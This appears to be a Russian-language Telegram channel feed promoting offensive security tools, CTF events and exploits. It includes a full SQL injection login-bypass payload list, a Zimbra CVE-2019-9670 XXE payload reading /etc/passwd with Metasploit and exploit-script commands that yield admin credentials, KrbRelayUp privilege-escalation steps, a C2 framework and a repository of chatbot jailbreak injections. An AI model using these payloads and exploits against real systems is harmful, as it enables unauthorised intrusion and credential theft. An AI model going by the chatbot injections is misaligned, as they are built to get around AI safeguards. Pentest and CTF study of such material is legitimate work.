This media is not supported in your browser
VIEW IN TELEGRAM
csprecon
Обнаружение новых целевых доменов с помощью политики безопасности содержимого (CSP)
Установка:
Обнаружение новых целевых доменов с помощью политики безопасности содержимого (CSP)
Установка:
go install github.com/edoardottt/csprecon/cmd/csprecon@latest
Примеры запуска:csprecon -u https://github.com
csprecon -l targets.txt
🔥5👍2❤🔥1
Offensive OSINT s04e04 - Open Source Surveillance
Общаясь с нашими подписчики, мы узнали о потребности в годных OSINT гайдах для CTF'еров, для себя любимого)
Поэтому поресерчили на нашли статью о наступательном OSINT'е. Так что пользуйтесь в своё удовольствие этими инструментами)
Наблюдение из открытых источников выводит сбор разведданных и кибершпионаж на совершенно новый уровень. Он может использоваться для обеспечения безопасности наступательных операций, но с другой стороны может быть полезен в OSINT и расследованиях правоохранительных органов. Благодаря 18 модулям, OSS может показать вид города в реальном времени с различных камер, постов в социальных сетях или устройств, подключенных к Интернету. Прочитайте статью, чтобы ознакомиться с инструментом и потенциальными случаями, в которых он может помочь.
Подробнее
Общаясь с нашими подписчики, мы узнали о потребности в годных OSINT гайдах для CTF'еров, для себя любимого)
Поэтому поресерчили на нашли статью о наступательном OSINT'е. Так что пользуйтесь в своё удовольствие этими инструментами)
Наблюдение из открытых источников выводит сбор разведданных и кибершпионаж на совершенно новый уровень. Он может использоваться для обеспечения безопасности наступательных операций, но с другой стороны может быть полезен в OSINT и расследованиях правоохранительных органов. Благодаря 18 модулям, OSS может показать вид города в реальном времени с различных камер, постов в социальных сетях или устройств, подключенных к Интернету. Прочитайте статью, чтобы ознакомиться с инструментом и потенциальными случаями, в которых он может помочь.
Подробнее
🔥4👍3❤1
Пробуем
Heroinn - это Кроссплатформенная платформа C2/post-exploitation framework, реализованная на Rust.
Функции:
1. GUI
2. Интерактивная оболочка PTY
3. Сбор системной информации
4. Поддержка файлового менеджера с возобновлением прерванной передачи и большого файла
5. Поддержка Win10+(Windows Server 2019+) & Linux & BSD & OSX
6. Множество протоколов связи (TCP & HTTP & надежный UDP)
#tools
Github
Heroinn легальноHeroinn - это Кроссплатформенная платформа C2/post-exploitation framework, реализованная на Rust.
Функции:
1. GUI
2. Интерактивная оболочка PTY
3. Сбор системной информации
4. Поддержка файлового менеджера с возобновлением прерванной передачи и большого файла
5. Поддержка Win10+(Windows Server 2019+) & Linux & BSD & OSX
6. Множество протоколов связи (TCP & HTTP & надежный UDP)
#tools
Github
👍7❤🔥2
Старт бесплатного обучения модулю script-kiddie
Когда?
🔔 7 февраля в 17:00 (МСК)
Что в программе?
🟠 Обучение работы в kali linux
🟠 Обучение основам сетей
🟠 Системное администрирование сетевых сервисов под Linux (nginx, ftp, ssh)
🟠 Программирование веб-приложений на языке программирования PHP
Преподаватель:
🎙Дон @dongani
Когда?
Что в программе?
Преподаватель:
🎙Дон @dongani
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9❤3👍2
Forwarded from Похек
CVE-2022-21587
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild
CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.
Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.
P.S. POC
Oracle E-Business Suite (EBS)
Status: Exploited in the Wild
CVE-2022-21587 может привести к неавторизованному удаленному выполнению кода. 16 января 2023 года компания Viettel Security опубликовала анализ этой проблемы, подробно описав первопричину и метод использования уязвимости для получения возможности выполнения кода через полезную нагрузку Perl. Эксплойт, основанный на методе анализа Viettel Security, был опубликован на GitHub "HMs" 6 февраля 2023 года. Oracle приписала "l1k3beef" в качестве первооткрывателя уязвимости.
Анализ показал, что во время эксплуатации также возможно использование полезной нагрузки на основе Java Server Page (JSP) для RCE.
P.S. POC
SSTImap
Это программное обеспечение для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей Code Injection и Server-Side Template Injection и эксплуатировать их, предоставляя доступ к самой операционной системе.
Этот инструмент был разработан для использования в качестве интерактивного средства тестирования на проникновение для обнаружения и эксплуатации SSTI, что позволяет осуществлять более продвинутую эксплуатацию.
#tools
Github
NetRunner 👾
Это программное обеспечение для тестирования на проникновение, которое может проверять веб-сайты на наличие уязвимостей Code Injection и Server-Side Template Injection и эксплуатировать их, предоставляя доступ к самой операционной системе.
Этот инструмент был разработан для использования в качестве интерактивного средства тестирования на проникновение для обнаружения и эксплуатации SSTI, что позволяет осуществлять более продвинутую эксплуатацию.
#tools
Github
NetRunner 👾
👍6
This media is not supported in your browser
VIEW IN TELEGRAM
Как вы помните, у нас есть CTF команда RHTeam, так вот для них сделали стикеры, разбирайте 😎
🔥7
Настроение у меня сегодня поделать посты, и есть у меня одна безумная идейка, сделать сложный и длинный CTF, для больших городов.
Пока в список входит:
Москва
Питер
Новосибирск
Да, что бы решить CTF, нужно выйти на улицу) 😉
Напиши свой город в комментариях, если будет много комментариев с одного города, то и там организуем)
А ниже проголосуй, за или против, если наберется 200 за, то мы начнём делать ❤️
Пока в список входит:
Москва
Питер
Новосибирск
Да, что бы решить CTF, нужно выйти на улицу) 😉
Напиши свой город в комментариях, если будет много комментариев с одного города, то и там организуем)
А ниже проголосуй, за или против, если наберется 200 за, то мы начнём делать ❤️
❤🔥6🔥2
🔥2
ADRT
Инструмент, используемый сетевыми администраторами и аналитиками безопасности для извлечения информации из Active Directory, такой как: Пользователи, группы, администраторы, контроллеры домена, пароль Never Expire, все компьютеры, все серверы, GPO, последний вход в систему, отключенные пользователи, группы участников и инвентаризация.
#ActiveDirectory #Windows
Инструмент, используемый сетевыми администраторами и аналитиками безопасности для извлечения информации из Active Directory, такой как: Пользователи, группы, администраторы, контроллеры домена, пароль Never Expire, все компьютеры, все серверы, GPO, последний вход в систему, отключенные пользователи, группы участников и инвентаризация.
#ActiveDirectory #Windows
👍5❤1
https://vk.com/cyberhackerss приглашает студентов-спикеров и слушателей посетить встречу-конференцию «Networks and RadioHack Meet-up»!
🗓 Когда: 5 марта в 12:00
📍где: Арт-пространство Графит (Фудхолл Графит
Электродная ул., 2, стр. 32)
🎟 бесплатная проходка для всех спикеров и слушателей
👥 количество мест: 40
📌 регистрация: https://xn--r1a.website/kibhack_bot
«Networks and RadioHack Meet-up» - это первая встреча-конференция от КибХак, на которой мы послушаем доклады, пообщаемся и, конечно же, выпьем ̶п̶и̶в̶а̶ лимонада (или все-таки пива). А еще это первая для нас встреча, которая будет организована за пределами ВУЗа.
Мероприятие будет полезным и для тех, кто ищет единомышленников для создания проектов, разработок, исследований, и для новичков, только начавших исследовать радиохакинг. Предполагаемые темы докладов для спикеров:
• технология SDR, RFID
• сети
• радиопротоколы, реверс радиопротоколов
• системы контроля доступа
• аппаратное обеспечение и разработка открытого исходный кода для контроллеров от исследователей, экспертов и интересующихся с последующим открытым обсуждением вопросов.
Если ты хочешь выступить с докладом или просто провести время с пользой и послушать выступления — регистрируйся через бота по этой ссылке: https://xn--r1a.website/kibhack_bot.
Окончательный список тем и другие обновления ты найдешь в беседах митапа и в [club192769069|группе] в ВК.
🗓 Когда: 5 марта в 12:00
📍где: Арт-пространство Графит (Фудхолл Графит
Электродная ул., 2, стр. 32)
🎟 бесплатная проходка для всех спикеров и слушателей
👥 количество мест: 40
📌 регистрация: https://xn--r1a.website/kibhack_bot
«Networks and RadioHack Meet-up» - это первая встреча-конференция от КибХак, на которой мы послушаем доклады, пообщаемся и, конечно же, выпьем ̶п̶и̶в̶а̶ лимонада (или все-таки пива). А еще это первая для нас встреча, которая будет организована за пределами ВУЗа.
Мероприятие будет полезным и для тех, кто ищет единомышленников для создания проектов, разработок, исследований, и для новичков, только начавших исследовать радиохакинг. Предполагаемые темы докладов для спикеров:
• технология SDR, RFID
• сети
• радиопротоколы, реверс радиопротоколов
• системы контроля доступа
• аппаратное обеспечение и разработка открытого исходный кода для контроллеров от исследователей, экспертов и интересующихся с последующим открытым обсуждением вопросов.
Если ты хочешь выступить с докладом или просто провести время с пользой и послушать выступления — регистрируйся через бота по этой ссылке: https://xn--r1a.website/kibhack_bot.
Окончательный список тем и другие обновления ты найдешь в беседах митапа и в [club192769069|группе] в ВК.
ВКонтакте
КибХак
«КиберХакерс» или «КибХак»- студенческое сообщество РТУ МИРЭА (каф. КиИБ ИИИ ) по информационным технологиям и кибербезопасности. Наше сообщество объединяет школьников, студентов старших и младших курсов, преподавателей, специалистов работающих в сфере ИБ…
❤3
Forwarded from Похек
SQL injection auth bypass list
or 1=1#sqli
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
🔥15❤2😍2❤🔥1👍1
udon
Инструмент на Go для поиска поддоменов на основе Google Analytics ID
Установка:
Инструмент на Go для поиска поддоменов на основе Google Analytics ID
Установка:
go install github.com/dhn/udon@latest
Использование:udon -silent -json -s UA-ID | jq -c
#tools🔥7❤🔥1
💬🤖💉 Chatbot Injections & Exploits🐱💻
Добро пожаловать в репозиторий инъекций и эксплойтов ChatBot. Это репозиторий представляет собой коллекцию возможных инъекций и эксплойтов, позволяющих "обмануть" любой ChatBot и заставить его делать то, что он не должен делать. Это репозиторий находится в процессе работы и будет регулярно обновляться. Если у вас есть какие-либо предложения или вы хотите внести свой вклад, пожалуйста, не стесняйтесь открыть проблему или запрос на исправление.
#chatgpt
Добро пожаловать в репозиторий инъекций и эксплойтов ChatBot. Это репозиторий представляет собой коллекцию возможных инъекций и эксплойтов, позволяющих "обмануть" любой ChatBot и заставить его делать то, что он не должен делать. Это репозиторий находится в процессе работы и будет регулярно обновляться. Если у вас есть какие-либо предложения или вы хотите внести свой вклад, пожалуйста, не стесняйтесь открыть проблему или запрос на исправление.
#chatgpt
🔥4👍3
Forwarded from Похек
XXE to RCE Zimbra CVE-2019-9670
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
Metasploit:
Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)
Payload XXE:
xxe [Ниже приведу парочку примеров, как эксплуатировать эту вулну.
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rceArambiz - эксплойт на Python3:
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit
clone https://github.com/oppsec/arbimz.gitZaber - эксплойт на Go:
pip3 install -r requirements.txt
python3 main.py --url https://example.com/
install github.com/oppsec/zaber@latestЕсли у вас не находит бинарь, то пропишите абсолютный путь.
zaber -u https://example.com
-u https://example.comА после работ не забудьте добавить
$HOME/go/bin/ в свой PATH 😉Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.
Буду рад, если распространите этот материал!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13
KrbRelayUp
Оболочка для
1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3.
5. Используя указанный
8. Генерирование нового
9. Использование полученного сертификата и
Оболочка для
Rubeus и KrbRelay для упрощения следующих атак:1. Создание нового аккаунта на локальной машине
2. Принудительная авторизация учетной записи на локальной машине
3.
Kerberos relay to LDAP
4. Добавление привилегий RBCD и получение Service Ticket (ST) на локальной машине5. Используя указанный
ST для аутентификации в локальном Service Manager и создания нового процесса, как NT/SYSTEM
6. Kerberos relay to ADCS (HTTP)
7. Генерирование запроса на сертификат от имени учетной записи локальной машины, отправка запроса в ADCS Web Enrollment для получения сертификата для учетной записи локальной машины.8. Генерирование нового
KeyCredential и добавление его к атрибуту msDS-KeyCredentialLink учетной записи локальной машины9. Использование полученного сертификата и
KeyCredential для получения TGT для учетной записи локальной машины через PKInit
10. Использование TGT для получения Service Ticket (ST) на локальной машине через S4U2Self и TGSSUB
#tools❤🔥10👍1